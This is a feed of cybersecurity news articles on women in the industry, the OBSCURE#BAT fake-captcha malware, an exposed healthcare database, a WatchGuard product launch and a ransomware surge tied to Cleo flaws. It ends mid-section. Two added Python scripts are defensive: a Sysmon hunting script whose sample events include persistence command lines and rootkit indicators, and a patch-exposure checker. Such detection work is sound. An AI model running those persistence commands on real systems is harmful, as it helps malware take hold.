CyberSecurity


Advancing Gender Equality in 2025 and Beyond


International Women’s Day (IWD) 2025 carries the powerful theme: ‘Accelerate Action.’ This theme calls on individuals, communities, and organisations to take decisive steps toward achieving gender equality. Despite ongoing efforts, at the current rate of progress, it will take until 2158, more than five generations, to reach full gender parity, according to the World Economic Forum. Such a timeline is unacceptable. Now, more than ever, we must accelerate action to break down systemic barriers and biases that hinder gender equality in both personal and professional spheres.

The Role of Women in Cybersecurity

The cybersecurity industry is one of the fastest-growing sectors globally, yet women remain deeply underrepresented in it. As of 2022, women accounted for only 25% of cybersecurity jobs, with projections suggesting an increase to 30% by 2025. However, leadership positions remain scarce for women, particularly in the UK. The challenge is ensuring that this growth is meaningful, extending beyond entry-level roles to positions of influence and decision-making.

With Diversity, Equity, and Inclusion (DEI) initiatives under increasing threat due to shifting global political landscapes, it is crucial to keep the conversation about gender equality alive, even when formal policies may be at risk. Industry leaders must explore how to sustain progress and prevent regression in diverse hiring and inclusive workplace cultures.

Step Outside Your Comfort Zone

Liz Harvey, Director of Product Research at Huntress, believes true growth comes from stepping outside one’s comfort zone and embracing diversity in all its forms. She emphasises the importance of rejecting sameness and actively fostering inclusivity by challenging norms and making intolerance unacceptable.

“Build tolerance. Become the other,” Harvey says, reflecting on the experiences that shaped her perspective. From working as an AmeriCorps Construction Crew Lead at Habitat for Humanity, where she defied traditional gender roles, to immersing herself in different cultures while studying abroad, she has continuously sought opportunities to broaden her worldview.

She recalls joining community soccer leagues and summer camps organised by a religion different from her own, gaining first-hand insight into new beliefs and perspectives. Throughout her career, she has often been the only woman in the room, yet she has never let that limit her. Instead, she encourages others to step beyond familiar spaces, embrace discomfort, and contribute to a more inclusive world.

“Reject sameness. Embrace adventuring out of your comfort zone to evolve humanity,” Harvey urges. “Make intolerance unacceptable.” Her message is clear: true progress comes from diversity, curiosity, and the courage to challenge societal norms.

Joy Burkholder Meier, General Counsel and Chief Human Resources Officer at Black Duck, agrees that stepping outside one’s comfort zone is important. She attributes much of her career growth to mentorship, not through formal programs but through organic relationships with leaders who offered guidance and encouragement.

Meier stresses the importance of being prepared for opportunities, embracing challenges, and actively solving problems rather than merely identifying them. Her key advice is to work hard, be a problem-solver, and make others’ jobs easier to stand out and advance in your career.

On diversity, Meier states: “Diverse viewpoints lead to the best results. If we don’t problem-solve with these diverse customer bases in mind, then we will have blind spots. And for me, diversity means a lot of different things – not only people of varying gender, race, or nationality but also different educational backgrounds and experiences. A diverse team is going to win every time.”

Breaking Barriers and Driving Change

Dr. Ksenia Peguero, Director of Software Engineering at Black Duck, underscores the historical significance of International Women’s Day, particularly in Russia and other countries where it’s been observed for over a century. “Having grown up in the Soviet Union, International Women’s Day has always been important for me. Firstly, it was and still is a federal holiday in my home country and in many other countries. It was declared a holiday in Russia by Vladimir Lenin as a day to celebrate gender equality in labour and voting rights more than a hundred years ago. Secondly, although the agenda of the holiday has changed throughout the years, its main focus on women’s rights and the advancement of women in the workplace and in all spheres of life is as important today as it was a hundred years ago,” she explains. 

Despite progress, gender disparities in pay, leadership opportunities, and household responsibilities persist, making the observance of this day more relevant than ever. In the tech industry, initiatives such as Girls Who Code and workplace employee resource groups (ERGs) are actively working to reduce bias and support women’s success. “In the technical field, women and allies have been working hard over the last few years to advance the success of women,” Peguero emphasises.

Aditi Gupta, Senior Manager of Professional Services Consulting at Black Duck, reflects on the slow but steady progress of women in STEM. “When I entered the technology workforce in India over 15 years ago, women made up roughly 12% of the STEM workforce. Growing up in my small Indian town, my exposure to professional women was primarily limited to teachers and bank employees, even though countless women contributed invisibly to the economy through informal labour. As one of the fortunate 8% of women enrolled in engineering programs then, I learned early on to pursue the less travelled path,” she notes. 

Despite these challenges, research consistently shows that companies with diverse leadership financially outperform their peers by 25%. At Black Duck, initiatives like the Women’s Employee Resource Group (ERG) play a crucial role in bridging gender gaps by providing mentorship, sponsorship, and networking opportunities. “Our ERG works to increase the visibility and representation of women in the industry,” Gupta emphasises, reinforcing the importance of continued efforts to foster diversity in technology.

More Female Representation Will Drive Change

Women face higher rates of cybercrime and online harassment, which makes cybersecurity awareness a vital tool for personal safety; that same experience can also open up career opportunities and professional growth.

Zoya Schaller, Director of Compliance at Keeper Security, emphasises the critical role of cybersecurity in protecting women from the unique threats they face online. “Women experience higher rates of cybercrime, online harassment, and privacy violations,” she explains. With most modern women having some form of online presence, understanding cybersecurity basics is essential for safeguarding personal information and maintaining control over digital identities. 

Beyond personal security, Schaller highlights the growing career opportunities in cybersecurity, an industry that combines intellectual challenges with excellent compensation and rapid growth potential. “By joining this field, women can both protect their own digital lives and help safeguard others,” she says, noting that diverse perspectives strengthen the industry’s ability to combat cyber threats more effectively.

Increasing female representation in cybersecurity is about more than just filling positions; it’s about transforming the industry with fresh perspectives and problem-solving approaches. “When we expand the talent pool to include more women, we’re not only addressing the huge skills gap in the field, but we’re also bringing in new ways of thinking about and solving security problems,” Schaller points out. 

Women’s ability to connect with people and communicate complex concepts in an accessible way makes a tangible impact, especially in designing security measures that users will actually adopt. “What good is a security solution if users find it so frustrating that they look for workarounds?” she asks. Women in cybersecurity also bring invaluable firsthand experience in tackling issues like online harassment and digital privacy, contributing to more effective solutions. Moreover, female leaders tend to uplift other women in the field through mentorship, fostering a ripple effect that benefits the entire industry. “A more diverse cybersecurity industry is better equipped to protect all of us in our increasingly connected world,” Schaller concludes.

Carla Roncato, VP of Identity at WatchGuard Technologies, also looks at how women’s experiences can open doors to career opportunities while addressing critical global challenges. “Today, approximately 850 million people around the world do not have an official ID or a digitally verifiable identification. This impacts their ability to access digital services, such as opening a bank account or applying for a loan. Women, in particular, are disproportionately affected by this identity gap,” she explains. This issue impacts countless communities, including those displaced by conflict and climate disasters, individuals facing housing insecurity, vulnerable youth without legal guardianship, and survivors of domestic violence seeking critical support.

Roncato stresses the importance of raising awareness around the need for digitally verifiable identification to enhance identity protection, reduce fraud, prevent identity theft, and provide broader access to essential services. She also encourages women to consider careers in technology and security, emphasising the opportunities in Digital Identity. “Digital Identity offers not just professional growth but the chance to create impactful change for women everywhere. There has never been a more important time to join this mission and help drive a more inclusive digitally secure future for all.” 

Shaping the Future

Catarina Santos, Data Protection Consultant at Data Protection People, emphasises the vital role women play in shaping policies, enforcing regulations, and safeguarding data security. She highlights how gender diversity strengthens digital infrastructure and fosters public trust, making the industry more resilient and effective.

“On International Women’s Day, we acknowledge the critical role women play in the evolving field of data protection. As the digital world grows increasingly complex, their expertise is central to shaping policies, enforcing regulations, and ensuring that personal data is kept safe and secure. Women in data protection are instrumental in tackling the challenges of data security, compliance, and privacy in today’s interconnected environment. Their work helps build trust, protect individuals’ rights, and support the integrity of the digital infrastructure. This day serves as a reminder of the importance of diverse leadership and the ongoing need for excellence and innovation in the field of data protection.”

Teresa Jose, Consultant at Pentest People, reflects on her journey into cybersecurity, expressing excitement about her growth and learning in the field. “I was thrilled to enter the cybersecurity industry when I first joined Pentest People as a graduate consultant. I’m incredibly proud of how much I’ve developed my understanding of security within the extended digital environments of organisational structures,” she shares.

She encourages more women to explore careers in cybersecurity, acknowledging the industry’s gender imbalance, particularly in offensive security roles. “Compared to other fields, cybersecurity has fewer female role models, especially in offensive security. I believe more women should consider entering this space,” she says. For those looking to break into the industry, Jose recommends earning fundamental certifications. “Getting certified is a great way to build a strong foundation in cybersecurity and gain a solid understanding of the cyber environment,” she advises.

Natalia Lewandowska, a Security Consultant at Pentest People, highlights the inspiration that comes with being a woman in cybersecurity. “It’s incredible to see more women breaking barriers in this field, bringing diverse perspectives and strengthening the industry as a whole,” she says. The increasing presence of female professionals, including those at Pentest People, fills her with pride and motivation. “Knowing that we are paving the way for future generations to thrive in tech and security is truly inspiring,” she adds.

The Need for Collective Action

The message for IWD 2025 is clear: gender equality cannot wait until 2158. While massive strides have been made, the risk of regression is real, especially with DEI initiatives under threat. Women in cybersecurity and all industries must continue advocating for inclusivity, challenging biases, and accelerating action toward gender equality.

The cybersecurity industry is a prime example of how diverse teams produce better outcomes, bridge skill gaps, and enhance problem-solving. The time for action is now.

The post Advancing Gender Equality in 2025 and Beyond appeared first on IT Security Guru.

New OBSCURE#BAT Malware Targets Users with Fake Captchas


OBSCURE#BAT malware campaign exploits social engineering & fake software downloads to evade detection, steal data and persist on systems. Learn how to stay safe.

Cybersecurity researchers at Securonix Threat Labs have spotted a new malware campaign called OBSCURE#BAT. This campaign uses social engineering tactics and fake software downloads to trick users into executing malicious code, enabling attackers to infect systems and avoid detection.

The attack begins with a user executing a malicious batch file, which is often disguised as a legitimate security feature (such as a captcha check) or a legitimate software download. Once executed, the malware establishes itself by creating scheduled tasks and modifying the Windows Registry so that it keeps running after the system reboots.

The malware then uses a user-mode rootkit to hide its presence on the system, making it difficult for users and security tools to detect. The rootkit can hide files, registry entries, and running processes, allowing the malware to embed further into legitimate system processes and services.

Fake Captchas and Malicious Software Downloads

As seen in recent similar campaigns, hackers have been leveraging typosquatting and social engineering tactics to present fake products as legitimate parts of a software supply chain. This includes:

Masquerading Software: Attackers disguise their malicious files as trustworthy applications, such as Tor Browser, SIP (VoIP) software or Adobe products, increasing the chances that users will execute them.

Fake Captchas: Users may encounter a fake captcha, in particular one imitating Cloudflare’s captcha check, that tricks them into executing malicious code. These captchas often originate from typosquatted domains that resemble legitimate sites. When users attempt to pass the captcha, they are prompted to execute code that has been copied to their clipboard.

[Figure: Fake captcha used in the attack (Screenshot: Securonix)]

Evasion Techniques

The OBSCURE#BAT malware campaign is a major cybersecurity threat to both individuals and organizations, primarily due to its ability to compromise sensitive data through advanced evasion techniques. These include:

API Hooking: By using user-mode API hooking, the malware can hide files, registry entries, and running processes. This means that common tools like Windows Task Manager and command-line utilities cannot see certain files or processes, particularly those that fit a specific naming scheme (e.g., names starting with "$nya-").

Registry Manipulation: It registers a fake driver (ACPIx86.sys) in the registry to ensure further persistence. This driver is linked to a Windows service, allowing it to execute malicious code without raising suspicion.

Stealthy Logging: The malware monitors user interactions, such as clipboard activity, and regularly writes this data to encrypted files, further complicating detection and analysis.

Countries Targeted in the OBSCURE#BAT Attack

According to Securonix’s detailed technical report, shared with Hackread.com before its official release on Thursday, the campaign appears to be financially motivated or aimed at espionage, targeting users primarily in the following countries:

  • Canada
  • Germany
  • United States
  • United Kingdom

How to Protect Yourself from the OBSCURE#BAT Attack

While common sense is a must when downloading software or clicking on unknown links, users and organizations should also follow these key security measures to protect their systems from OBSCURE#BAT and similar threats:

  • Clean downloads: Only download software from legitimate websites, and be wary of fake captchas and other social engineering tactics.
  • Use endpoint logging: For organizations, deploy endpoint logging tools, such as Sysmon and PowerShell logging, to enhance detection and response capabilities.
  • Monitor for suspicious activity: Regularly monitor systems for suspicious activity, such as unusual network connections or process behaviour.
  • Use threat detection tools: Consider using threat detection tools, such as behavioural analysis and machine learning-based systems, to detect and respond to threats like OBSCURE#BAT.
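The evasion techniques listed above (the "$nya-" naming scheme hidden by user-mode hooks, the ACPIx86.sys service registration, and scheduled-task persistence from a batch file) and the Sysmon/PowerShell-logging recommendation both point at the same defensive idea: endpoint telemetry records a file, registry or process event at the moment it happens, so a hook that later hides the artifact from Task Manager or a directory listing does not erase the log entry. The following is an added example written for this page, not code from Securonix or the article, that hunts for those indicators in endpoint events. It assumes a constructed one-event-per-line export of Sysmon-style fields (real Sysmon output is XML/EVTX, so the tiny parser is a stand-in); the sample events, rule names and file paths are constructed, and the only indicators taken from the article are the "$nya-" prefix and the ACPIx86.sys driver name.

```python
"""Hunt for OBSCURE#BAT-style persistence and evasion indicators in Sysmon-style events.

Added example, not the article's or Securonix's code. The line format
'EventID=<n> Key=Value Key="Quoted value"' is a constructed stand-in for a
real Sysmon export.
"""
import re
from dataclasses import dataclass

# Indicators named in the article: the rootkit hides names starting with
# "$nya-", and persistence registers a fake driver ACPIx86.sys as a service.
HIDDEN_PREFIX = "$nya-"
FAKE_DRIVER = "acpix86.sys"

# Constructed sample telemetry (not real captured events). Sysmon event IDs:
# 1 = process create, 11 = file create, 12/13/14 = registry events.
SAMPLE_EVENTS = [
    r'EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c C:\Users\u\Downloads\setup.bat" ParentImage=C:\Windows\explorer.exe',
    r'EventID=1 Image=C:\Windows\System32\schtasks.exe CommandLine="schtasks /create /tn Updater /tr C:\ProgramData\run.bat" ParentImage=C:\Windows\System32\cmd.exe',
    r'EventID=11 Image=C:\Windows\System32\cmd.exe TargetFilename=C:\ProgramData\$nya-log.dat',
    r'EventID=13 Image=C:\Windows\System32\reg.exe TargetObject=HKLM\SYSTEM\CurrentControlSet\Services\ACPIx86\ImagePath Details=C:\Windows\System32\drivers\ACPIx86.sys',
    r'EventID=1 Image="C:\Program Files\Mozilla Firefox\firefox.exe" CommandLine="firefox.exe" ParentImage=C:\Windows\explorer.exe',
]

# Key=Value pairs; a value is either "quoted, may contain spaces" or a bare token.
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


def parse_event(line: str) -> dict:
    """Turn one constructed-format line into a field dictionary."""
    return {key: (quoted if quoted else bare) for key, quoted, bare in FIELD_RE.findall(line)}


def basename(path: str) -> str:
    """Last path component of a Windows path or registry key."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def check_event(idx: int, ev: dict) -> list:
    """Apply the detection rules to a single parsed event."""
    findings = []
    eid = ev.get("EventID")
    image = basename(ev.get("Image", "")).lower()
    parent = basename(ev.get("ParentImage", "")).lower()
    cmd = ev.get("CommandLine", "")
    if eid == "1":
        # Initial access as described: the user runs a disguised .bat from Explorer.
        if ".bat" in cmd.lower() and parent == "explorer.exe":
            findings.append(Finding("batch_launched_by_user", idx, cmd))
        # Persistence: a scheduled task created from a cmd.exe (batch) context.
        if image == "schtasks.exe" and "/create" in cmd.lower() and parent == "cmd.exe":
            findings.append(Finding("schtasks_from_batch", idx, cmd))
    if eid == "11":
        # File create events are recorded by the logging driver at creation time,
        # so a user-mode hook that later hides the file does not hide this entry.
        target = ev.get("TargetFilename", "")
        if basename(target).startswith(HIDDEN_PREFIX):
            findings.append(Finding("hidden_prefix_file", idx, target))
    if eid in ("12", "13", "14"):
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        if basename(target).startswith(HIDDEN_PREFIX):
            findings.append(Finding("hidden_prefix_registry", idx, target))
        # A service key whose image points at the fake driver name.
        if "\\services\\" in target.lower() and FAKE_DRIVER in details.lower():
            findings.append(Finding("fake_driver_service", idx, details))
    return findings


def hunt(lines) -> list:
    """Run every rule over every line and return all findings in event order."""
    findings = []
    for idx, line in enumerate(lines):
        findings.extend(check_event(idx, parse_event(line)))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] event #{f.event_index}: {f.detail}")
```

The rules are deliberately narrow and keyed to the behaviours the article describes; on a real estate they would be tuned (for example, excluding known software installers that legitimately call schtasks.exe) and fed from an actual Sysmon or PowerShell transcript pipeline rather than the constructed line format used here.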


MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team


Organised by Eskenzi PR in media partnership with the IT Security Guru, the Most Inspiring Women in Cyber Awards aim to shed light on the remarkable women in our industry. The following is a feature on one of 2024’s Top 20 women selected by an esteemed panel of judges. Presented in a Q&A format, the nominee’s answers are written in their own words.

In 2025, the awards were sponsored by BT, KnowBe4, Mimecast, Varonis, Bridewell, Certes, Pentest Tools and AI Dionic. Community partners included WiCyS UK & Ireland Affiliate, Women in Tech and Cybersecurity Hub (WiTCH), CyBlack and Inclusive InCyber (LT Harper). 

What does your job role entail?

As Chief of Staff for Microsoft Red Team, I drive the strategy behind how we innovate and evolve red teaming—transforming it from purely technical operations into a strategic security pillar that directly shapes Microsoft’s overall security direction. My role is to define what modern red teaming looks like—not just for Microsoft, but for the industry—as this space rapidly evolves.
Microsoft is pioneering and reimagining how red teams operate in this new era, ensuring that every finding leads to measurable, lasting fixes. With the rise of AI and the Security Graph, we are shifting from product-based technical assessments to precision-driven security, uncovering micro-level vulnerabilities that could have massive impact. I also lead the vision for extending red teaming beyond human limitations, not only within Microsoft but across our customer ecosystem, helping to shape the future of collective defense. This includes driving strategies to accelerate remediation and push toward a self-healing security model—where threats are dynamically identified, understood, and resolved at scale.

How did you get into the cybersecurity industry?

I never set out to work in cybersecurity—I stumbled into it by accident. But looking back, I realize I’d been preparing for it all along. After leaving my small town in Bulgaria with just $50 and a dream for something bigger, I spent years relentlessly building my tech skills, working nights in restaurants and weekends for free on small tech projects just to prove myself. I was exhausted, broke, and doubted myself constantly. There were so many moments I almost gave up. But I didn’t.
And then, one day, cybersecurity found me. An unexpected opportunity appeared, and even though I felt unqualified and terrified, I took the leap. That leap changed everything.
Cybersecurity became the perfect place for my grit and curiosity to collide—a field where I could protect people, solve complex problems, and make a real impact. Today, I lead strategy for the Microsoft Red Team, helping shape the future of red teaming not just for Microsoft, but for the entire industry.
If my story proves anything, it’s this: you don’t have to see the whole path. You just have to keep going. Keep building. Keep believing. Because sometimes the thing you never planned for becomes the thing you were born to do.

What is one of the biggest challenges you have faced as a woman in the tech/cyber industry and how did you overcome it?

One of the biggest challenges I faced as a woman in cybersecurity was overcoming deep imposter syndrome—believing I didn’t belong in the room. Coming from a small town in Bulgaria with no role models in tech, I carried years of conditioning that told me success in this field wasn’t meant for people like me. Early in my career, I often felt like I had to blend in—dressing, speaking, and acting like the men around me just to be taken seriously.
What helped me overcome it was realizing that my unique story, my perspective, and my authenticity are exactly what make me strong. I found inspiration through the few women ahead of me who owned their space unapologetically, and they helped me see what was possible. Now, I make it my mission to be that example for others—showing women that we don’t have to change who we are to succeed in cybersecurity. We belong here exactly as we are.

What are you doing to support other women, and/or to increase diversity, in the tech/cyber industry?

I’m deeply committed to helping women and underrepresented groups break into cybersecurity and thrive. Over the years, I have served—and continue to serve—on various leadership boards and advisory groups to help shape the future of the industry and drive meaningful community impact. This includes organizations like OWASP Seattle, the EC-Council Certified Ethical Hacker (CEH) Advisory Board, Women in Cybersecurity (WiCyS), and ISACA Puget Sound.
As Co-Founder of Women in Tech Global and a leader in Microsoft Women in Security, I’ve helped build global communities that give women access to career opportunities, speaking platforms, and technical growth.
I also actively mentor young women, guiding them through career transitions, helping them overcome self-doubt, and supporting them as they step into leadership roles they may not have thought possible.
Beyond mentorship, I’m passionate about modernizing cybersecurity education. Through projects like The Hacking Games, I’m helping inspire the next generation of diverse talent by reimagining how we teach ethical hacking to Gen Z.
For me, this work is personal. I know how hard it is to build a path where none exists. That’s why I’m committed to being the example I wish I’d had—and ensuring no woman feels like she has to do it alone.

Who has inspired you in your life/career? 

I’ve been most inspired by the women who dared to take up space in rooms where they were never expected to belong—and did it unapologetically. Seeing strong women lead in cybersecurity with both confidence and authenticity showed me that we don’t have to trade our uniqueness to succeed in this industry. Their example helped me realize that my story, my background, and even my struggles are my power.
But beyond individual people, I’m inspired by the millions of women who haven’t yet been told they belong here. I think of the little girls staring out of windows in small towns, just like I once did, wondering if there’s more to life than what’s been handed to them. They inspire me to keep going, keep building, and keep showing up—because if I can be proof for even one of them that a different future is possible, then every challenge I’ve faced was worth it.
We need more examples to emulate—more women leading, succeeding, and owning their space—so others can see themselves in us. That’s why what we’re doing here is so important. Visibility creates possibility. And together, we’re redefining what’s possible for the next generation.

The post MIWIC25 – Eva Benn, Chief of Staff, Strategy – Microsoft Red Team appeared first on IT Security Guru.

HealthTech Database Exposed 108GB Medical and Employment Records


A misconfigured database exposed 108.8 GB of sensitive data, including information on over 86,000 healthcare workers affiliated with ESHYFT, a New Jersey-based HealthTech company operating across 29 states. ESHYFT also provides a mobile platform that connects healthcare facilities with qualified nursing professionals.

The exposed database was not password-protected or encrypted and contained a treasure trove of personally identifiable information (PII) including SSNs, scans of identification documents, salary details, work history, and more.

The database was discovered by cybersecurity researcher Jeremiah Fowler, whose report, shared with Hackread.com, reveals that the exposed data also included profile images, facial images, professional certificates, work assignment agreements, CVs, and resumes.

Additionally, one spreadsheet document contained over 800,000 entries detailing nurses’ internal IDs, facility names, time and date of shifts, hours worked, and more. What’s worse, medical documents, including medical reports containing information on diagnoses, prescriptions, or treatments, were also exposed.

The exposure of such sensitive data could potentially fall under HIPAA regulations. It can also expose vulnerable users to online and physical risks, including identity theft, employment fraud, financial fraud, and targeted phishing campaigns.

The good news is that Fowler immediately notified ESHYFT. The bad news is that it took the company over a month after being alerted to restrict public access to the database. However, according to Fowler, the exposed database was not owned or directly managed by ESHYFT.

It remains unclear whether a third-party contractor was responsible for its management. Additionally, the duration of the exposure and whether unauthorized parties accessed the data are unknown.

Nevertheless, cybercriminals could use the exposed data to commit crimes in the victims’ names or deceive them into revealing additional personal or financial information. Therefore, HealthTech companies must implement proper cybersecurity measures, including the following:

  • Implement mandatory encryption protocols for sensitive data.
  • Use multi-factor authentication to prevent unauthorized access.
  • Conduct regular security audits to identify potential vulnerabilities.
  • Segregate sensitive data and assign expiration dates for data that is no longer in use.
  • Have a data breach response plan in place and a dedicated communication channel for reporting potential security incidents.
  • Provide timely responsible disclosure notices to affected individuals and educate them on how to recognize phishing attempts.


WatchGuard unveils FireCloud Internet Access


WatchGuard® Technologies, a provider of unified cybersecurity, has announced the launch of FireCloud Internet Access, the first in what it’s describing as “a new family of hybrid secure access service edge (SASE) products”. The company said that FireCloud “uniquely meets the needs of hybrid organisations and WatchGuard’s partners by delivering consistency across Fireboxes and FireCloud with nearly identical configurations and no learning curve.”

Managing real-world cybersecurity means managing hybrid networks that combine traditional on-premises and Cloud/firewall-as-a-service (FWaaS) environments. Many vendors providing SASE solutions overlook the importance of integrated on-premises environments, which diminishes the value of deploying a SASE solution. When a SASE solution does not take these environments into account, it ends up creating isolated systems that are managed separately, leading to unnecessary complexity and overhead.

FireCloud Internet Access, WatchGuard said, is the “right answer” for hybrid environments because it integrates with WatchGuard Cloud and shares unified policy management with Firebox, combining firewall-as-a-service (FWaaS) and secure web gateway (SWG) to deliver robust protection without complexity. Furthermore, WatchGuard enables managed service providers (MSPs) to deliver a valuable SASE solution to their clients with an adoption model that fits their hybrid environments. This solution is part of the WatchGuard Unified Security Platform® architecture, which includes Identity, Network, and Endpoint security components, unified management in the WatchGuard Cloud, and a common installation framework for WatchGuard endpoints.

“FireCloud Internet Access provides real security for real-world challenges that today’s businesses face. As remote and distributed work environments evolve and companies transition to the Cloud, the range of threat surfaces and location of endpoints that need protection has expanded,” said Andrew Young, chief product officer at WatchGuard. “Existing solutions don’t allow security teams to seamlessly manage their network security in concert with their SASE deployments, creating security gaps and management complexities. To overcome these limitations, we have developed a new hybrid SASE approach which begins with FireCloud Internet Access.”


The FireCloud Internet Access Difference: In addition to being uniquely designed for hybrid Cloud/on-premises environments, FireCloud Internet Access also promises ease of deployment, flexible and scalable licensing and pricing, and integration into WatchGuard’s threat detection and response platform.

  • Designed for Hybrid – WatchGuard’s SASE architecture is one of the few solutions that is designed to deliver value and benefits to a hybrid environment. For lean IT teams or MSPs, this approach means easier management, consistent security controls, and lower costs over other SASE offerings.
  • Ease of Deployment – Administrators can configure and enforce security policies from a single interface, which simplifies management by using consistent policy structures and terminology. Security settings are automatically deployed to all WatchGuard-hosted points of presence (PoPs) worldwide, ensuring consistent policy enforcement no matter where the user is located. FireCloud clients are delivered from the WatchGuard Cloud, making them easy to deploy and manage.
  • Flexible and Scalable – The flexible pricing available with WatchGuard’s FlexPay helps build and grow managed security services provider (MSSP) business. As a firewall-as-a-service, the number of users doesn’t impact performance, and more licenses can be easily added with customer growth.

WatchGuard is committed to delivering a complete SASE solution to meet partners’ and their clients’ needs. Over time, WatchGuard’s FireCloud family of solutions covering private access, SD-WAN, ZTNA, and CASB will be built out and deployed. Along the way, FireCloud customers will also benefit from soon-to-be-released integrations with ThreatSync+ software as a service (SaaS), delivering overwatch threat detection and response, and the client will be integrated with the soon-to-be-released WatchGuard Universal Agent, which simplifies device management. As always, WatchGuard said it will work closely with partners to determine the specific SASE needs of their clients.

“SASE is the future of secure connectivity, merging network and security functions into a Cloud-native service. With FireCloud Internet Access and its overall approach to hybrid SASE architecture, WatchGuard’s focus on delivering powerful cybersecurity solutions specially designed for MSPs is on full display,” said Kevin Willette, president of Verus. “This is an affordable and effective solution to protect our clients’ networks and users while still using the same enterprise security found in our Firebox, which makes my business more efficient and improves our bottom line.”

This news follows WatchGuard’s recent acquisition of ActZero, a leading provider of Managed Detection and Response (MDR) services, to accelerate MDR growth for MSP partners and extend their sales reach. WatchGuard, which received recognition from IT Awards, ChannelVision, Fortress Cybersecurity, InfoSec Awards, and TMCnet for its security solutions in 2024, continues to lead the industry in security innovation to offer MSPs more scalable, ready-to-sell solutions that drive revenue.

 

The post WatchGuard unveils FireCloud Internet Access appeared first on IT Security Guru.

126% Surge in Attacks in February 2025


February 2025 saw a record 126% surge in ransomware attacks, with Cl0p leading the charge. Attackers leaned on file transfer flaws, infostealers, and AI-driven tactics, according to Bitdefender’s latest Threat Debrief report.

Cybersecurity just reached a new milestone, and not in a good way. According to Bitdefender’s latest Threat Debrief report, February 2025 was the worst month on record for ransomware, with a 126% increase in claimed victims compared with the same month last year.

This jump took the number of claimed victims from 425 in February 2024 to 962 in February 2025. The surge came despite the United States-led alliance of 40 countries, announced in November 2023, formed to dismantle ransomware gangs and their infrastructure by disrupting payments, taking down infrastructure, and improving intelligence sharing.

Clop (Cl0p) Ransomware at Its Peak

According to Bitdefender’s report, shared with Hackread.com ahead of publication on Thursday, the Cl0p (Clop) ransomware group was responsible for more than a third of the attacks, claiming 335 victims in a single month, a 300% increase over the previous month.

So, what’s behind this sudden rise in attacks? Cybersecurity experts point to a trend that is not so new: attackers are increasingly targeting vulnerabilities in edge network devices, such as file transfer systems and remote access tools.

Instead of focusing on specific industries, these opportunistic attackers scan the internet for easily exploitable flaws and launch automated attacks. The Cl0p gang, for example, is notorious for exploiting vulnerabilities in MOVEit, a managed file transfer (MFT) product, most notably in 2023. The group stole so much data through the MOVEit flaws that it launched a clearnet website to leak information stolen from victims worldwide.

In December 2024, Cl0p also claimed to be exploiting security vulnerabilities in Cleo’s managed file transfer software, specifically the Cleo Harmony, VLTrader, and LexiCom products. Bitdefender’s Threat Debrief likewise observed Cl0p exploiting the Cleo vulnerabilities CVE-2024-50623 and CVE-2024-55956, both rated 9.8 out of 10 (critical) in severity.

Both flaws allow attackers to execute commands remotely on affected systems without prior authentication and were disclosed late last year. CVE-2024-55956 was assigned after the initial fix for CVE-2024-50623 was found to be bypassable, so systems that applied only the first update remained exposed. Despite patches being available, many organizations failed to update in time, leaving them open to exploitation and contributing to the surge in victims seen in February 2025.
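As an added illustration (not Bitdefender’s or Cleo’s code), the script below ranks an asset inventory by exposure to a vulnerability with a known fixed version. The inventory rows and the fixed-version thresholds are constructed placeholders; take the real fixed versions from the vendor advisory for the two CVEs above before running this against a live asset list. The point it makes is the one behind the February numbers: internet-facing, unpatched systems sort to the top, and the version comparison is numeric, because a naive string comparison puts 5.8.0.9 above 5.8.0.24.

```python
"""Rank an asset inventory by exposure to a known-fixed vulnerability.

Added example for this article; it is not Bitdefender's or Cleo's code. The
inventory rows and the fixed-version thresholds are constructed placeholders:
read the real fixed versions from the vendor advisory for CVE-2024-50623 and
CVE-2024-55956 before running this against a live asset list.
"""
import re

# Placeholder thresholds (assumption, verify against the vendor advisory): the
# version at or above which a product is treated as patched.
FIXED_VERSIONS = {
    "Cleo Harmony": "5.8.0.24",
    "Cleo VLTrader": "5.8.0.24",
    "Cleo LexiCom": "5.8.0.24",
}

# Constructed inventory: (hostname, product, installed version, internet-facing?)
SAMPLE_INVENTORY = [
    ("mft-edge-01", "Cleo Harmony", "5.8.0.9", True),
    ("mft-int-02", "Cleo VLTrader", "5.8.0.21", False),
    ("mft-edge-03", "Cleo LexiCom", "5.8.0.24", True),
    ("erp-01", "SomeOtherERP", "12.1", True),
]


def parse_version(text):
    """'5.8.0.24' -> (5, 8, 0, 24). Integer tuples compare numerically, so
    5.8.0.24 sorts above 5.8.0.9; a plain string comparison gets that wrong."""
    nums = re.findall(r"\d+", text)
    if not nums:
        raise ValueError(f"no numeric version in {text!r}")
    return tuple(int(n) for n in nums)


def is_below(installed, fixed):
    """True when installed < fixed. Shorter tuples are zero-padded so that
    '5.8' is treated as 5.8.0.0."""
    a, b = parse_version(installed), parse_version(fixed)
    width = max(len(a), len(b))
    a += (0,) * (width - len(a))
    b += (0,) * (width - len(b))
    return a < b


def assess(inventory, fixed=FIXED_VERSIONS):
    """Return one row per tracked product, internet-facing unpatched first."""
    rank = {"P1": 0, "P2": 1, "ok": 2}
    rows = []
    for host, product, version, exposed in inventory:
        threshold = fixed.get(product)
        if threshold is None:
            continue  # product not covered by this advisory
        vulnerable = is_below(version, threshold)
        if vulnerable and exposed:
            priority = "P1"   # reachable from the internet and unpatched
        elif vulnerable:
            priority = "P2"   # unpatched but only reachable internally
        else:
            priority = "ok"
        rows.append({"host": host, "product": product, "version": version,
                     "fixed": threshold, "vulnerable": vulnerable, "priority": priority})
    rows.sort(key=lambda r: rank[r["priority"]])
    return rows


if __name__ == "__main__":
    for r in assess(SAMPLE_INVENTORY):
        print(f'{r["priority"]:3} {r["host"]:12} {r["product"]:14} {r["version"]:>9} (fixed: {r["fixed"]})')
```

In the constructed inventory the host on 5.8.0.21 is the interesting one: it looks patched to anyone who only checked for the first advisory, but a numeric comparison against the later threshold still flags it.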

The illustration highlights the rapid pace at which ransomware gangs exploit vulnerabilities and shift to new targets. (Credit: Bitdefender)

Other Notable Developments in the Ransomware World

Beyond the record-breaking numbers, Bitdefender researchers noticed several other noteworthy trends in February 2025 including:

FunkSec’s New Infostealer

